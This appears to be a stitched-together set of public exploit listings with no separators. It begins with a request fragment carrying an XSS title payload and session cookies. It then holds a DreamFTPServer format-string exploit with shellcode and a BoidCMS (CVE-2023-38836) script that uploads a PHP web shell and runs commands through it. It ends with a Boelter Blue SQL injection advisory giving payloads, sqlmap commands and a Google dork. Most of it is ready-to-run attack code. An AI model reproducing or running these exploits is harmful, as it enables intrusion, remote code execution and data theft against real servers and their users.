Cookie: bolt_session_cf7976ea5999f8e272ce7cd50c84d240=14b61865131cf9422af970ae28a097b7; bolt_authtoken_cf7976ea5999f8e272ce7cd50c84d240=0b69633d5a549f19bf3faa88462b7b8e17ba57ba9dff6d25a708efe6dd6a9a04
Upgrade-Insecure-Requests: 1
content_edit%5B_token%5D=jMmm41dJQXpXx3gwE_VQkA60fdsNo6DERJClPVkYh7U&editreferrer=&contenttype=pages&title=%3Cscript%3Ealert%28%22Raif%22%29%3C%2Fscript%3E&slug=script-alert-raif-script&image%5Bfile%5D=&files%5B%5D=&teaser=&body=&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2018-12-07+00%3A12%3A05&datedepublish=&ownerid=1&_live-editor-preview=
import socket
import os
import sys
print '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: DreamFTPServer1.0.2_RETR_command_format_string_remotecodevuln
# Date: 2016.11.04
# Exploit Author: Greg Priest
# Version: DreamFTPServer1.0.2
# Tested on: Windows7 x64 HUN/ENG Professional
'''
ip = raw_input("Target ip: ")
port = 21
overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901071x%n%8x%8x%24954x%n%x%x%x%n'
nop = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
#overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901090x%n%8x%8x%24954x%n%x%x%x%n\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
#shellcode calc.exe
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")
remotecode = overflow + nop + shellcode + '\r\n'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((ip ,port))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASSW hacker@hacker.net\r\n')
s.recv(1024)
print remotecode
print '''
Successfull Exploitation!
'''
message = 'RETR ' + remotecode
s.send(message)
s.recv(1024)
s.close
#!/usr/bin/python3
# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
# Date: 08/21/2023
# Exploit Author: 1337kid
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://boidcms.github.io/BoidCMS.zip
# Version: <= 2.0.0
# Tested on: Ubuntu
# CVE : CVE-2023-38836
import requests
import re
import argparse
parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
parser.add_argument("-u", "--url", help="website url")
parser.add_argument("-l", "--user", help="admin username")
parser.add_argument("-p", "--passwd", help="admin password")
args = parser.parse_args()
base_url=args.url
user=args.user
passwd=args.passwd
def showhelp():
print(parser.print_help())
exit()
if base_url == None: showhelp()
elif user == None: showhelp()
elif passwd == None: showhelp()
with requests.Session() as s:
req=s.get(f'{base_url}/admin')
token=re.findall('[a-z0-9]{64}',req.text)
form_login_data={
"username":user,
"password":passwd,
"login":"Login",
}
form_login_data['token']=token
s.post(f'{base_url}/admin',data=form_login_data)
#=========== File upload to RCE
req=s.get(f'{base_url}/admin?page=media')
token=re.findall('[a-z0-9]{64}',req.text)
form_upld_data={
"token":token,
"upload":"Upload"
}
#==== php shell
php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']
with open('shell.php','w') as f:
f.writelines(php_code)
#====
file = {'file' : open('shell.php','rb')}
s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
req=s.get(f'{base_url}/media/shell.php')
if req.status_code == '404':
print("Upload failed")
exit()
print(f'Shell uploaded to "{base_url}/media/shell.php"')
while 1:
cmd=input("cmd >> ")
if cmd=='exit': exit()
req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})
print(req.text)
# Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3)
# Google Dork: inurl:"Powered by Boelter Blue"
# Date: 2024-06-04
# Exploit Author: CBKB (DeadlyData, R4d1x)
# Vendor Homepage: https://www.boelterblue.com
# Software Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_US
# Version: 1.3
# Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12
# CVE: CVE-2024-36840
## Vulnerability Details:
### Description:
Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQL commands through the affected parameters. Successful exploitation can lead to unauthorized access, data leakage, and account takeovers.
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=10071 AND 4036=4036
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)
Type: UNION query
Title: Generic UNION query (NULL) - 44 columns
Payload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
1. **news_details.php?id** parameter:
sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
2. **services.php?section** parameter:
sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
3. **location_details.php?id** parameter:
sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs
Impact:
Unauthorized access to the database.
Extraction of sensitive information such as admin credentials, user email/passhash, device hashes, user PII, purchase history, and database credentials.
Account takeovers and potential full control of the affected application.
Discoverer(s)/Credits:
CBKB (DeadlyData, R4d1x)
References:
https://infosec-db.github.io/CyberDepot/vuln_boelter_blue/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36840